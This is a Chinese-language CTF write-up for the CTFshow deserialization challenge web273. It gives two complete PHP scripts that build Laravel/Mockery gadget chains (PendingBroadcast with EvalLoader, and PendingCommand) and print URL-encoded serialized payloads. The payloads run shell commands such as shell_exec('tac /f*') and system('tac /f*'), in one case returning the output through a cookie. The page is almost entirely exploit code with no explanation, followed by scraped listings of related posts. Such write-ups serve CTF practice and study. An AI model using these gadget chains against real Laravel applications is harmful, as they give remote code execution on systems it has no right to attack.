题解

两个链子都可以用

exp1 flag在cookie

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-05-05 22:27:03
# @Last Modified by:   h1xa
# @Last Modified time: 2021-05-05 22:39:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/namespace PhpParser\Node\Scalar\MagicConst{class Line {}
}
namespace Mockery\Generator{class MockDefinition{protected $config;protected $code;public function __construct($config, $code){$this->config = $config;$this->code = $code;}}
}
namespace Mockery\Loader{class EvalLoader{}
}
namespace Illuminate\Bus{class Dispatcher{protected $queueResolver;public function __construct($queueResolver){$this->queueResolver = $queueResolver;}}
}
namespace Illuminate\Foundation\Console{class QueuedCommand{public $connection;public function __construct($connection){$this->connection = $connection;}}
}
namespace Illuminate\Broadcasting{class PendingBroadcast{protected $events;protected $event;public function __construct($events, $event){$this->events = $events;$this->event = $event;}}
}
namespace{$line = new PhpParser\Node\Scalar\MagicConst\Line();$mockdefinition = new Mockery\Generator\MockDefinition($line,"<?php setcookie('shell',shell_exec('tac /f*')); ?>");$evalloader = new Mockery\Loader\EvalLoader();$dispatcher = new Illuminate\Bus\Dispatcher(array($evalloader,'load'));$queuedcommand = new Illuminate\Foundation\Console\QueuedCommand($mockdefinition);$pendingbroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispatcher,$queuedcommand);echo urlencode(serialize($pendingbroadcast));
}

exp2

<?php
namespace Illuminate\Foundation\Testing{class PendingCommand{protected $command;protected $parameters;protected $app;public $test;public function __construct($command, $parameters,$class,$app){$this->command = $command;$this->parameters = $parameters;$this->test=$class;$this->app=$app;}}
}
namespace Illuminate\Auth{class GenericUser{protected $attributes;public function __construct(array $attributes){$this->attributes = $attributes;}}
}
namespace Illuminate\Foundation{class Application{protected $hasBeenBootstrapped = false;protected $bindings;public function __construct($bind){$this->bindings=$bind;}}
}
namespace{$genericuser = new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1")));$application = new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application")));$pendingcommand = new Illuminate\Foundation\Testing\PendingCommand("system",array('tac /f*'),$genericuser,$application);echo urlencode(serialize($pendingcommand));
}
?>

总结

水题

CTFshow 反序列化 web273相关推荐

ctfshow 反序列化篇（下）
web267(yii框架) 开启靶机,是一个网站,试着搜索有没有重要信息.在这里发现是yii框架. 我们使用弱口令admin/admin就可以登录进来了,那就继续收集重要信息.在源代码中发现了重要注释 ...
CTFshow 反序列化 web266
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # ...
CTFshow 反序列化 web259
目录源码思路题解总结源码 <?phphighlight_file(__FILE__);$vip = unserialize($_GET['vip']); //vip can get f ...
CTFshow 反序列化 web277
目录源码题解总结源码查看源代码提示pickle,得知考点是pickle反序列化题解 exp 试了几次不能用bash,最后用了/bin/sh,因为环境里面没有装bash,得不到响应nc连上 ...
CTFshow 反序列化 web261
目录源码思路题解总结源码 <?phphighlight_file(__FILE__);class ctfshowvip{public $username;public $passwor ...
CTFshow 反序列化 web260
目录源码思路题解总结源码 <?phperror_reporting(0); highlight_file(__FILE__); include('flag.php');if(preg_ ...
CTFshow 反序列化 web262
目录源码思路题解解法一直接构造类进行序列化解法二字符逃逸总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date ...
CTFshow 反序列化 web263
目录源码思路题解总结源码也没有什么别的信息,扫一下目录,下载www.zip拿到源码思路知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处 ...
CTFshow 反序列化 web258
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # ...

CTFshow 反序列化 web273

目录

题解

总结

CTFshow 反序列化 web273相关推荐

最新文章

热门文章